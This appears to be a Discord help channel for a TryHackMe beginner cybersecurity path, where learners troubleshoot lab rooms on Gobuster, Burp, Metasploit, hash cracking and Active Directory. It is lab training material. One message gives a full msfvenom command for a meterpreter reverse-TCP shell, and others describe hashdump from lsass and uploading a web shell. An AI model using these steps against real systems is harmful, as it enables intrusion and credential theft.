#cyber-security-101-path

1 messages Β· Page 3 of 1

rapid breach
#

should it look like this?

woeful jungle
#

10.10.145.255 offensivetools.thm www.offensivetools.thm πŸ™‚

rapid breach
#

it worked. thanks!

woeful jungle
rapid breach
#

it seems like i have another problem :/

rapid breach
#

i dont understand why i can not get the other domains with this command

#

do you have a guess?

sick onyx
#

I had the same problem, since we only added 1 subdomain to the hosts file (www.offensivetools.thm). I fixed it by editing the /etc/resolv.conf file and setting the IP after nameserver to the IP of the DNS server

#

this routes all DNS requests via that nameserver

#

@rapid breach

woeful jungle
novel lintel
#

Hi, I'm currently working on the Burp Suite: The Basics Room and a little stuck. I configured the settings of the Burp proxy according to instructions but am not able to record any HTTP responses. Any tipps?
("Intercept responses" is activated, as well as "or request was intercepted")

woeful jungle
novel lintel
#

😦

novel lintel
#

I just get the requests somehow @woeful jungle

woeful jungle
#

It will block all the requests

zinc geode
#

Is it possible to have your progress reset to start over? I'm a returning user and am a little lost on where I left off. I know I can repeat the lessons, but my old answers are there.

woeful jungle
zinc geode
woeful jungle
proven sierra
zinc geode
olive fogBOT
#

Gave +1 Rep to @proven sierra (current: #2634 - 1)

balmy tangle
#

im having an issue in the gobuster: the basics room when i run gobuster its saying it is unable to connect i reviewed the file it had me alter in the begining but unsure why it is still unable to connect both att box and server still have time left on them

woeful jungle
balmy tangle
#

@kgb thx

#

i found where you recommened doing that for some one else and it working now

#

trying to the next question should it find the file quickly or will it take a little bit ? just wanting to if im doing it wrong not have to wait for the entire scan

woeful jungle
balmy tangle
#

@woeful jungle thank you

olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #2 - 2650)

woeful jungle
toxic marsh
sick onyx
#

they should definitely update the room if everyone is having trouble with it

lethal jolt
#

Anybody doing Linux fundamentals rn?

woeful jungle
lethal jolt
#

I’m learning it right now and I was curious how you guys are practicing to really get it down

woeful jungle
lethal jolt
#

I don’t feel like I have it down just by doing that do you? I want to memorize it or be more familiar

woeful jungle
lethal jolt
woeful jungle
lethal jolt
#

Hmm. How much farther are you than me??

woeful jungle
#

You will get used to over time πŸ™‚

rotund anvil
woeful jungle
rotund anvil
woeful jungle
still basin
#

is metasploit this slow normally or is it because im connecting from far away

#

most of my commands are timing out

fickle hedge
#

Are you using a VPN or the attack box

still basin
#

vpn

#

the attack box was usually so slow i couldnt even do a nmap

fickle hedge
#

Next question, are you using a VM or running Linux as a live boot

still basin
#

kali vm on my linux, since i dont have msfconsole installed

fickle hedge
#

I can’t speak for all, but in my travels with running Kali on a VM, the connections were always slow. Nmap and other scanners took FOREVER. I solved a lot of my issues by just booting Kali from a USB.

#

Now using a VPN to use any of the THM machines is remarkably quicker

still basin
#

hm maybe i should dual boot

#

dont really want kali as my main

fickle hedge
#

What I do. Windows laptop with a dual boot Kali from USB

#

I agree on not using Kali as a daily but dual boot solves those concerns

still basin
olive fogBOT
#

Gave +1 Rep to @fickle hedge (current: #2642 - 1)

woeful jungle
fickle hedge
rain elbow
fickle hedge
#

Trying to get a metasploit reverse shell in Metasploit Exploitation task 5. I’m following the directions and manage to get a reverse shell, but not metasploit. The task requires me to be able to run a metasploit search command, which I can’t do

#

And now I can’t even exploit using a generic reverse tcp shell using the same parameter as the first time, which was successful

#

Figured it out. Reset to a new room. I guess maybe once you exploit successfully the first time, that’s it, no retrying anything else

rain elbow
woeful jungle
fickle hedge
woeful jungle
fickle hedge
#

Except for my brainfart when reading the next question which led me down the complete wrong wormhole? Yes. Everything’s good

woeful jungle
still basin
#

question

#

for rooms like hydra or burp where you have to go to the target machine ip on your web browser

#

how would you do that on vm?

#

there was nothing in that address when i tried on my kali

woeful jungle
still basin
#

no way to do it on the vm then?

woeful jungle
still basin
#

yea

woeful jungle
still basin
#

i already did so

#

but nothing was on the address

woeful jungle
still basin
#

hold up

#

oh nevermind it is working today

still basin
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #2 - 2783)

still basin
#

in this case though they dont provide the password list txt so i guess i gotta do it on the vm

#

nvm im supposed to use rockyou

woeful jungle
rare gyro
#

Why do some certs expire like CEH, NSE(Fortinet), etc.?

woeful jungle
steady roost
#

For john the ripper basics task 6,"...to crack /etc/shadow passwords, you must combine it with the /etc/passwd file for John to understand the data it’s being given."
the room doesnt really explain what it means to "unshadow" and combine the files for john, i dont understand why you would need to unshadow if you can crack the hashes from /etc/shadow, is it to match the hashes to usernames in /etc/passwd?

woeful jungle
steady roost
woeful jungle
steady roost
steady roost
woeful jungle
stark ore
#

how can I RDP into a windows machine to do the AD tasks?

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #2 - 2943)

rapid widget
stark ore
woeful jungle
rapid widget
stark ore
stark ore
rapid widget
stark ore
woeful jungle
#

@fallow cradle

tame mauveBOT
#

Done!

stark ore
rapid widget
#

and no username

stark ore
rapid widget
#

ye ill try

rapid widget
#

thank you

stark ore
woeful jungle
rapid widget
woeful jungle
rapid widget
#

i think thats why i wasnt able to use those

#

ye already got that part, just had to put the target machine's IP

#

thank you anyways

woeful jungle
rapid widget
#

yes i got it

woeful jungle
tacit carbon
#

the lesson owasp attack ssrf the adress ip is already it's normal but why i can't connect me ?

dusty vale
#

owasp top 10?

tacit carbon
#

a few moments later

#

the machine take 10years

dusty vale
tacit carbon
#

with nslookup

north obsidian
#

I've just finished the path and I'm very happy. Now I'm going to start the Path Jr Penetration Tester

woeful jungle
north obsidian
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 3442)

novel lintel
#

HI, I have to enter an IP address in a defanged format, can somebody maybe tell me what that means exactly? I have no clue unfortunately...

woeful jungle
#

basically it will wrap . with [] Ex: 111[.]111[.]111[.]111

novel lintel
#

Ah, now I understand! Thanks very much!

rapid widget
#

in the Networking Secure Protocols room, the last task it cointains says to look for some login logs on wireshark, already found the POST, however the size of the password i found ("thm&pass=THM%7BB8WM6P%7" (which i assume it reads "THM{BB8WM6P}")) doesnt match the size of the required awnser, am i missing something?

#

the max input i can awnser is "THM{BB8WM6}" and its wrong

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 3528)

rapid widget
#

do you recommend anything i could do to put to use my (basic) linux skills to use so i can gain some memory on the commands and actually use them for a bit?

#

i have a linux terminal installed and everything, i just dont know what to actually do with it

dark narwhal
#

Hi,

In Active Directory room in the Task 2, is it possible to connect to the machine via RDP from our own local machines?

Can we use the following creds?

  • Computer: THM_MACHINE_IP
  • Username: THM/Administrator
woeful jungle
dark narwhal
woeful jungle
dark narwhal
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 3550)

normal finch
cold osprey
woeful jungle
left linden
#

In the networking essentials room, task 6, last question pretty much asks how many thousand tcp ports there are.

Iirc there are 65535. However the answer is 65. Why is it not 66 after rounding?

left linden
normal finch
woeful jungle
spice obsidian
# woeful jungle Do you experience any error or ?

I can't find subdomain in gobuster, I think the syntax is fine

└──╼ #gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     offensivetools.thm
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2025/03/06 05:55:27 Starting gobuster in DNS enumeration mode
===============================================================
                              
===============================================================
2025/03/06 05:55:47 Finished
===============================================================
└──╼ #cat /etc/resolv-dnsmasq
nameserver 10.10.23.73
└──╼ #cat /etc/hosts
# Host addresses
10.10.23.73    offensivetools.thm
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters

already tried to edit /etc/hosts to www.offensivetools.thm too

woeful jungle
spice obsidian
#

Already tried with www.offensivetools.thm too but the results are same

woeful jungle
spice obsidian
#

Yes, i can confirm this is the target machine

woeful jungle
spice obsidian
#

Okay, thanks πŸ‘

woeful jungle
severe oar
#

hi there, just finished the path, super excited and i am trying to acces my certificate, when i click on view certificate it takes me to a new tab where it partially loads the certificate without any of the fields being completed to then ultimately fail to load and fetch a 500 internal server error response. Anything i can do? should i just wait for a bit until this is fixed? thank you!

woeful jungle
severe oar
#

got it, thank you! yes, have my actual name in there hehe

spice obsidian
# woeful jungle Does it work now ?

IT IS ! THANKS ! πŸ‘ πŸ‘

└──╼ #gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -r 10.10.147.166
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     offensivetools.thm
[+] Threads:    10
[+] Resolver:   10.10.147.166
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2025/03/06 14:29:35 Starting gobuster in DNS enumeration mode
===============================================================
Found: www.offensivetools.thm
Found: forum.offensivetools.thm
Found: store.offensivetools.thm
Found: primary.offensivetools.thm
                                 
===============================================================
2025/03/06 14:33:06 Finished
===============================================================
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 3739)

sullen swan
#

Hi! I'm looking for some help with the Metaspoloit: Exploitation room. I've tried following along with walkthroughs and I'm hung up in the same spot every time. I made the payload with msfvenom, start the server on the attackbox, download the .elf file on the target machine, chmod to allow execution priviledges, START a meterpreter session on the attackbox, run the .elf on the target machine.... and then it all falls apart.
I get this: meterpreter >
[*] 10.10.219.189 - Meterpreter session 1 closed. Reason: Died

woeful jungle
sullen swan
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 3848)

hot rivet
#

How important is it to know the math behind Cryptography? I am just worried because I did the first walkthrough of the "Cryptograthpy" room (cryptography basics) and I just don't get the mathmatics (I am not great at maths)

lethal light
#

Eh, you can get a lot done with the math black-boxed. I don't really know much about it beyond "factoring large numbers is hard", "discrete log is hard", and "discrete log on elliptic curves is harder". Didn't stop me from doing what I needed to do at the sysadmin/break-fix/firewall-support level of things. I'm sure there's some point where it would be beneficial to really grok the math of it, but for the most part, it's a concern for the people who are compartmented off in their own little segment of the industry where they write crypto algos/libs IMO

#

From a penetration standpoint, finding vulnerabilities through pure cryptanalysis is to finding vulnerabilities in implementation as lock-picking is to bypass techniques. Cool and impressive and probably fun, but practically speaking, not as much of a thing.

hot rivet
olive fogBOT
#

Gave +1 Rep to @lethal light (current: #245 - 31)

hot rivet
#

I'll still try learn and understand it but good to know it shouldn't matter too much if I find it hard

full moon
#

I will contuine here

prime socket
#

the stuff in that room are the very basics, so i would recommend at least learn the basics

hot rivet
prime socket
#

if you tell me exactly how much of the math part you can understand, and what you can't understand, i can send you alternate resources that explains it better

#

https://youtu.be/Pq8gNbvfaoM?si=xS7dg01xZRQ0jSdy
https://youtu.be/KXq065YrpiU?si=eUFsNbKzWW8sdJXC
if you can't understand the math behind RSA and DH key exchange specifically, i would suggest going through these videos

In this we discuss RSA and the RSA algorithm. We walk our way through a math example of generating RSA keys, and then proving the ability to encrypt a message with one key and decrypt with the other (in both directions).

We show you how RSA uses prime numbers to create keys and encrypt/decrypt messages. And discuss how the Security of RSA lies ...

β–Ά Play video

The Diffie-Hellman protocol is the underpinning of so many other security protocols on the Internet. It's the most popular answer to the question: How do we establish a shared key over an unsecure wire?

Diffie-Hellman uses a sequence of math calculations to answer that question. And in this video I'm going to prove it to you.

This lesson is a...

β–Ά Play video
hot rivet
#

Thanks, on my way back from London so I'll take a little look when I'm back:)

#

Really appreciate it

pliant notch
#

30% done 😀

#

Trying to find the aliens name in the wire shark module but I have no idea how too 😭😭

pliant notch
#

Never mind I got it

#

W

hot rivet
#

Hey guys, on room "Metasploit: Exploitation" currently using the MS17-010 exploit remoting onto the device. I am trying to change directory but I have no clue why I cannot. I try and it just enters a new line below my command which allows command input but then doesn't do anything? Little lost

woeful jungle
hot rivet
#

I tried that too 😭

thick stump
#

double \

#

for some reason discord is hiding it.

hot rivet
#

Ah that works

woeful jungle
#

put path in quotes

hot rivet
#

AH that's why, thanks both makes much more sense

thick stump
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4148)

woeful jungle
tropic sorrel
#

Hello guys, I have a question about the Cybersecurity 101 path. I realized that this path teaches you a little about many topics. What I want to know is: should I research and dig deeper into these topics, or should I just keep moving forward and complete the entire path first?

thick stump
woeful jungle
tropic sorrel
olive fogBOT
#

Gave +1 Rep to @thick stump (current: #2771 - 1)

thick stump
ancient lark
#

why is my path not updating its % when I finish a room in Cyber Sec 101?

woeful jungle
woeful jungle
# ancient lark

In the mean time , try to restart room progress , leave the room and re-join. Then complete tasks again , maybe it will help

drifting bluff
#

boutta begin the pentester path now that I finished cyber sec 101

woeful jungle
fiery narwhal
#

I’m trying to answer a question in the SQL fundamentals room but it’s saying unauthorised when I submit my answer

woeful jungle
fiery narwhal
#

I had to log out of my account then log back in

stark ore
#

Ive been away for a while, and now that Im back, the website is trying to play me:

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4329)

viscid flame
tropic sorrel
#

Is it just me or is the Cryptography course on TryHackMe kinda hard?

woeful jungle
tropic sorrel
woeful jungle
#

Don't worry for now

tropic sorrel
woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4378)

vague patrol
#

Thought id add this in here for anyone stuck on the "Networking Core Protocols" telnet portion like I was. You need to double click enter to actually send the telnet request and not have it timeout blobfingerguns

#

Actually had to use chat GPT to help walk me through what my incorrect input was.

woeful jungle
faint crystal
#

my god, I've just finished the active directory "basics" room which is classed as Easy and 30 minutes! I must have spent about 4 or 5 hours working through that!

woeful jungle
mystic verge
#

You are probably saving your future self some time!

faint crystal
kind plank
#

Where can I read more about the "Moniker Link (CVE-2024-21413)" ?
I want to know more about it. πŸ™‚

steel pier
#

I used same tool on binary but had other imphash value

umbral rune
#

Really struggling with Public Key Cryptography Basics - is this normal? Struggling to make sense of the math, does anyone have any resources that can help explain this? My brain is melting rn

woeful jungle
umbral rune
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4555)

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4556)

woeful jungle
gilded prism
#

Good day everyone I am currently in the cybersecurity 101 and module ACTIVE DIRECTORY in TASK 4

according to the screenshot here, I need to enter Claire previous password which wasn't provided

I (Philip) was delegated ability to changed her password which I did,

Now I need to login into her account with the new password but the old one is being demanded

Where can I find it pls

gilded prism
#

Pls what am I expected to do

gilded prism
#

i used windows RDP to try logging in her account and as for the passowrd input.. i used the NEW PASSWORD... then FOR NEW PWD input i still used the new password which is Asdf123456@ now it says the passowrd isnt complex...is there any requirement for the password lenght or character??

clever salmon
#

That should work hopefully.

gilded prism
#

ok thanks

#

i even checked the GOP (default domain policy) for the THM domain for computer configuration and minimum lenght was 10 ,max was unlimited

#

will try ur solution too

#

will try your solution too

lunar coyote
#

Windows Powershell Task 4.

should the answer not be: get-content -path c:\users?

#

nvm

#

I thought it was a file, not a directory, my bad.

lunar coyote
#

was using get-content instead of get-childitem πŸ˜›

lunar coyote
#

this one bugged my brain, as in the attackbox it did not show the answer

woeful jungle
lunar coyote
woeful jungle
lunar coyote
lunar coyote
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4581)

woeful jungle
lunar coyote
torpid yoke
#

in http(s) accessing the web section in Networking core protocol room, required to access the server using telnet and get the flag.html file, and when writing telnet [ipaddr] it requires to login using user and password, am I missing something here?

#

ok I found my mistake thx anway :)))))))))

lunar coyote
#

how long is this supposed to be running for

woeful jungle
torpid yoke
#

anyone can help me find the login credentials using wireshark? network security protocols room

woeful jungle
torpid yoke
woeful jungle
#

Try to search for strings like password πŸ™‚

olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4594)

lunar coyote
#

Am I missing something? I can't find the correct answer for this

#

god never mind, the answer is above those 2 terminal examples

lunar coyote
#

Networking Secure Protocols. task 8 closing notes.
The room asks me to find the password in a Wireshark packet. But I have been given any explanation on how to use wireguard before

#

what am I supposed to be looking for?

lunar coyote
#

there are a lot of lines

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4601)

woven horizon
#

Hello, I want to ask in metasploit: exploitation room

Based on introduction task, wordlist locating in directory /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt but I can't found it. Where is the wordlist file exactly?

woeful jungle
#

find / -type f -name MetasploitWordlist.txt 2>/dev/null

woven horizon
#

Hmm still can't found it, I will change to another one

#

Ok positive, thank you

woeful jungle
blissful cobalt
#

having an issue at the module active directory basics,task 4. when i want to follow the example from the task,and set up a password for sophie,it gives me an error,i am logged in as Phillip in powershell,via RDS.

#

this is the issue.what am i doing wrong ?

#

no matter the pass i put in there,it's the same error

willow isle
#

I had issues with that one as well and it took some playing around to get it to cooperate

blissful cobalt
#

I will try again tom. I was in the browser studying for 8 hours straight. My eyes are bleeding. Break for now. Going back tomorrow.

#

But thanks for the tip. Also special characters are ok ? Like @ for example ?

willow isle
#

Sometimes a break is the best thing. I didn’t use any special characters in mine. Keep it simple with something like Pizzaslice2004 or Itisraining1899.

blissful cobalt
#

hello guys

blissful cobalt
#

why nano is such an douche with me ? i am doing the task 5 in linux shell, the locker script. i know the answer already cause i did the script. the issue is that i cannot go back to shell to actually execute the script. i save it,chose exit,and i am still in nano,but with shell prompt....and when i am trying the command to execute the script i just did,it says permission denied

#

issue at hand

willow isle
#

You missed a step after exiting nano. You need to chmod +x to give the script permission to execute before trying to execute. Also check that it is saving properly in nano

lunar coyote
#

Am I missing something from hashcat exercise? trying to find the password. Will I have to wait for it to finish? may take some hours

woeful jungle
lunar coyote
woeful jungle
lunar coyote
woeful jungle
lunar coyote
woeful jungle
lunar coyote
woeful jungle
lunar coyote
#

@woeful jungle

woeful jungle
olive fogBOT
#

Gave +1 Rep to @lunar coyote (current: #1860 - 2)

ember isle
#

In the room Moniker Link (CVE-2024-21413)
did anyone attempt to crack the netntlmv2 hash? I tried johntheripper and hashcat with rockyou.txt, but no luck.

woeful jungle
ember isle
#

I did. No luck. Maybe it's actually a good password

steep shoal
#

Hello, why I'm getting's all these passwords ? I found the second flag with ssh but the first one it seems there is a problem

#

room hydra

#

ok I dont no what happen there but I restart the target machine and now I got the password PeepoRead

#

that was wierd

winter escarp
#

Hello everyone, I would like to know if I'm the only one to have bugs with the "Pratical Task" in "Shell Overview". For me, i'm trying to do a reverse shell for the first question and when i catch a connection from the server, i cannot do anything. It's like i don't get any response from the server. i checked a video and I did the same thing.

winter escarp
#

That's it

woeful jungle
winter escarp
#

i tried with 556, 4558, 8081 and same thing

woeful jungle
winter escarp
#

Well i just restarted the server and it seems work

#

And thanks for the support @woeful jungle

olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4749)

dark narwhal
#

Hello,

In the Windows PowerShell room, specifically under task 7, I need to determine the hash of the hidden treasure (big-treasure.txt) that was discovered earlier. However, when I generate its hash using Get-FileHash and submit the result, the answer doesn't seem to be fully accepted.

Could I be overlooking something, or perhaps using the wrong file?

woeful jungle
dark narwhal
#

For some reason it doesn't show the full hash, and ends it with ...

woeful jungle
dark narwhal
woeful jungle
dark narwhal
#

Doesn't recognize the -o option

woeful jungle
#

Try to pipe this | Out-File <file-name>

dark narwhal
woeful jungle
# dark narwhal Same results

Set higher resolution in remmina's settings . Output is too long and it gets truncated or try to open that file with notepad πŸ™‚

olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4751)

delicate lotus
#

its not just me the aswer is not listed right

#

nevermind dident put port number

late quarry
#

You could add a suggestion for it on #feedback-and-ideas (to have a separate username and certificate name).

tropic sorrel
#

Is there a way to change the name in the cert?

weak maple
tropic sorrel
weak maple
crystal frost
#

The powershell module the third section "Powershell Basics" and the first question "How would you retrieve a list of commands that start with the verb Remove? [for the sake of this question, avoid the use of quotes (" or ') in your answer]"
I'm trying to solve it with "Get-Command -verb remove*" and I get an error. The characters match the answer and on my own machine the command works as specified in the question. Kinda puzzled am I.

golden gust
#

Try contacting our support about it. Not certain but if anyone can help they can.

crystal frost
#

Thanks must do that but it's past midnight here. I think I better get some sleep and contact the support later today.

woeful jungle
crystal frost
#

Thanks. Seems like I was thinking too fancy like Remove is a verb and since the Powershell documentation specifically filters verbs and nouns separately with different arguments I got stuck. Happens to me all the time. The frustration factor kicked in when the actual command worked in powershell and not in THM. Reminds me my old now late professor who said that when the terrain and map differ, trust the terrain.

tropic sorrel
#

Hello everyone, do I need to have some web programming knowledge before going for this walkthroughs?

kind plank
woeful jungle
kind plank
tropic sorrel
olive fogBOT
#

Gave +1 Rep to @kind plank (current: #2854 - 1)

tropic sorrel
kind plank
woeful jungle
dark narwhal
#

Hi

In the Networking Secure Protocols Room, Closing Note, is there an optimized or smarter approach to locating the password within a packet? Or is the only reliable method to check packet 366, as suggested in the hint?

woeful jungle
dark narwhal
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4830)

cyan sapphire
#

Managing Users in AD
I joined as Sophia, but I don't see any flag on my desktop

woeful jungle
#

you're in tmp folder now

cyan sapphire
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4831)

viral frigate
#

So.. I am doing Networking and I feel like I've seen almost all of these in PreCyber is there anything I should revisit?

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4832)

woeful jungle
dark narwhal
#

Hey

In the Hashing Basics room, Task 6 first question, when I try to run the hashcat I didn't get any results. Here is the command: hashcat -m 3200 -a 0 hash 1.txt /usr/share/wordlists/rockyou.txt

Am I using any wrong parameters?

willow isle
dark narwhal
willow isle
#

Your syntax looks correct, so it’s probably the hash type that needs to be adjusted. Confirm you’ve got the right one again

willow isle
willow isle
olive fogBOT
#

Gave +1 Rep to @willow isle (current: #1419 - 3)

willow isle
dark narwhal
#

What hash type is this?

willow isle
#

Should be sha512crypt since it starts with $6$

dark narwhal
#

I tried 1700 and 1720 for sha512 but it is showing no hash loaded or separtor unmatched

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4880)

gilded prism
#

Good day everyone, currently in Moniker Link (CVE-2024-21413) TASK 3 EXPLOITATION Insruction says Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox which i did by chcecking th AttackBox IP which is 10.10.167.99 After successfully sending message to the victiom by running the python script, I click on the link in my inbox but i get error according to the screenshot below saying ** we cant find '\10.10.197.99\test!exploit' pls make sure u are using the correct web address** Kindly check my script if i am not linking the IP address well... This is my script content ```

#

its showing // as \ in the error

next kraken
#

Hello everyone, a question for the nmap basics room why is it not scanning its stuck at 83%

#

nevermind it worked

woeful jungle
lusty cradle
# gilded prism

That pop up showed for me. Go back to the terminal running responder and the hash value should be there.

gilded prism
#

Hello everyone , i am in metasploit:Exploitation task 5.. for question 2 What is the content of the flag.txt file? used the **exploit(windows/smb/ms17_010_eternalblue) ** Then a payload generic/shell_reverse_tcp used my machine 1P as RHOSTS ....says target is not vulnerable but the hint states The target is missing the MS17-010 patch

woeful jungle
gilded prism
#

okay

#

switched to (windows/x64/meterpreter/reverse_tcp) still not vulnerable

woeful jungle
gilded prism
#

ok

#

noticed whn i click start machine in task 5, other machines in task 3 and 7 buttons are also disabled, as if i pressed them

woeful jungle
gilded prism
#

sucessfully established a session, thank u

woeful jungle
#

Yeah , scan can take up to 10-15min even on AttackBox

#

That also depends on the flags that you're using and on the actual target . There's no universal answer to that question πŸ™‚

faint crystal
#

So I've just finished Metasploit: Exploitation room and it bamboozled me a bit! I really struggled initially with being asked questions on Meterpreter when that's the next room! I don't know if the order is right or whether I was just too slow πŸ˜„

woeful jungle
faint crystal
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4938)

golden marsh
#

Hey guys i am 50 % completed of the 101 cyber security, i wondered if i can start to do some challenges now, what do you think

coarse drum
coarse drum
woeful jungle
coarse drum
#

I was thinking that was probably the case, I've tried a couple recently and was pretty lost on portions of them so far

gilded prism
#

METASPLOIT MSFVENOM TASK...The elf file generated looks somehow when i check the content downloaded on my target machine thereby not making the file executable . Below is the text and screenshot...first is the downloaded shell.elf file on my target machine second is what it originally looks like when geenrated on my attackbox After running my handler, i proceeded to execute on my target machine to get a meterpreter session but its says error of $ ./shell2.elf
./shell2.elf: 1: j: not found
./shell2.elf: 2: ^1SCSjf[h: not found
./shell2.elf: 4: Syntax error: Unterminated quoted string
*

delicate lotus
#

im having a very hard time on Vulnerability Scanner Overview i cant use the weblink can somone from staff review this please as its hard to pass

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4958)

hollow leaf
woeful jungle
olive fogBOT
#

Gave +1 Rep to @hollow leaf (current: #2891 - 1)

gilded prism
faint crystal
# gilded prism **Good day everyone, pls can someone help me out** πŸ™πŸ™πŸ™

I had trouble with that one. Are you creating your elf file correctly?
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=AttackBoxIP LPORT=XXXX -f elf > rev_shell.elf
I think I set the LPORT to 4444

Then in Metasploit; use exploit/multi/handler but crucially with the correct payload and setting the LHOST and LPORT to whatever your attack box is and the port you setup in elf creation?
I think the payload is what tripped me up - I used the default but had to change it to the reverse_tcp one to get it working.

Oh and I had to have the VM open in a different window because every time I flipped between the attack box and the VM in split screen mode; it would reset my bash cli in the VM

gilded prism
olive fogBOT
#

Gave +1 Rep to @faint crystal (current: #2891 - 1)

gilded prism
#

πŸ”΄πŸ”΄πŸ”΄πŸ”΄πŸ”΄

hi everyone ... Currently in meterpreter last task, tyring to get the NTLM HASH of the target machine... After migrating to the lsass.exe process id , i run the command hashdump and the session always gets terminated as soon as i type hashdump i dont understand why.. i used getuid to check my user priviledge and i have a SYSTEM PRIVILEDGE so defintely i am okay to run the hashdump command but it always closes when i do... itied increasing the session timeout, still not solved....pls what can i do

#

tried using a post module on the session instead of the ** hashdump command** and still error **post(windows/gather/hashdump) **

gilded prism
#

βœ…βœ…βœ…βœ…βœ…βœ…βœ…βœ…
I just waited again and ran the command starting a fresh from** msfconsole and I used the lsass.exe and it worked**

Congratulations πŸŽ‰πŸ₯³πŸ₯³ to me

gilded prism
#

Thank you

small needle
#

Hey, I'm getting a wierd issue with the monikerlink room where "attacker" was not defined.

#

Google doesn't seem to know what I am taking about, and rechecked everything was copied over correctly. Bit lost.

#

Solved?: I works when you use python3 as the command but not python πŸ€·β€β™‚οΈ Bit wierd but whatever.

woeful jungle
dark narwhal
#

Hi

Is it recommended to remember or memorize all the vulnerabilities listed under OWASP Top 10?

woeful jungle
dark narwhal
dark narwhal
#

The given URL under the OWASP Top 10, task 8 is not working
I tried both http and https but none of them are working

woeful jungle
dark narwhal
#

Found it, I terminted the machine under task 2 and restarted it, and now it is working

stark ore
#

Hello again! I find myself stuck: What hostname (subdomain) appears in the first DNS query? Tcpdump question.

woeful jungle
stark ore
woeful jungle
#

Try to add -A flag for more verbose output

stark ore
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 4988)

gilded prism
#

Good day evryone, i am in Burp suite TASK 10 Take a look around the site on http://10.10.171.96/ β€” we will be using this a lot throughout the module. Visit every other page that is linked on the homepage, then check your sitemap β€” one endpoint should stand out as being very unusual! What is the flag you receive after visiting the unusual endpoint? NOW i cant see any unsuall endpoint that fits the hint: You are looking for a suspicious page with a name made up of a series of random letters and numbers.

woeful jungle
gilded prism
woeful jungle
gilded prism
#

Ok

gilded prism
#

Done same thing, can't find the url

#

I on the interceptor, made my request on Firefox, captured it on burp, then switched the interceptor

#

I don't think switching off interceptor is the solution, cus it had done it's work of intercepting the request, so no point switching it off

woeful jungle
gilded prism
#

Ok

#

Did that and when I visited the either support or contact page, I got the url and the flag

#

Thank you for your help πŸ™πŸ™

warm sky
#

I'm on OWASP Top 10 Task 15 and I'm trying to upload the shell and it keeps saying this. Failed to write to the webserver. Is that meant to be part of the CTF because I'm sure I have done everything correctly

warm sky
#

I solved it I missed the port SMH

woeful jungle
willow isle
#

I'm pretty good at figuring things out and solving any issues I come upon, but wow did Task 5 of the Metasploit Exploitation room humble me for no reason πŸ˜‚

dark narwhal
#

Hi

For the GoBuster: The Basics room, I am trying to do the Task 6 but not getting any vHost matches after running the command shown in the screenshot.

Am I using a wrong wordlist?

woeful jungle
dark narwhal
woeful jungle
dark narwhal
#

connection refused again

dark narwhal
dark narwhal
#

Is it the server issues?

woeful jungle
dark narwhal
#

okay

dark narwhal
woeful jungle
dark narwhal
dark narwhal
woeful jungle
dark narwhal
dark narwhal
woeful jungle
dark narwhal
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5014)

cinder valley
#

I have been facing an issue for sometime whenever I use hydra its shows me multiple correct password but when I try those none of them work, any ideas why its failing?

woeful jungle
cinder valley
woeful jungle
gilded prism
#

πŸ”΄πŸ”΄πŸ”΄πŸ”΄πŸ”΄πŸ”΄Good day everyone, Currently at cyberchef and the link to access the web based platform isn't working, I also tried downloading the file from GitHub, the url works but the file also not downloading

I prefer just having a web link to downloading so pls anyone with the correct cyberchef url should kindly send

woeful jungle
cinder valley
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5052)

junior ingot
#

Hello, i've got a problem in Hashing Basics : i'm doing the fourth task and i have to use raimbow tables like Crackstation.net or hashes.com to get the plaintext of 2 hashes. However, both websites didn't find anything...

#

To check by yourself :

#

Manually check the hash β€œ4c5923b6a6fac7b7355f53bfe2b8f8c1” using the rainbow table above.

#

Crack the hash β€œ5b31f93c09ad1d065c0491b764d04933” using an online tool.

#

and there's no salt

junior ingot
#

i can send you a screenshot

#

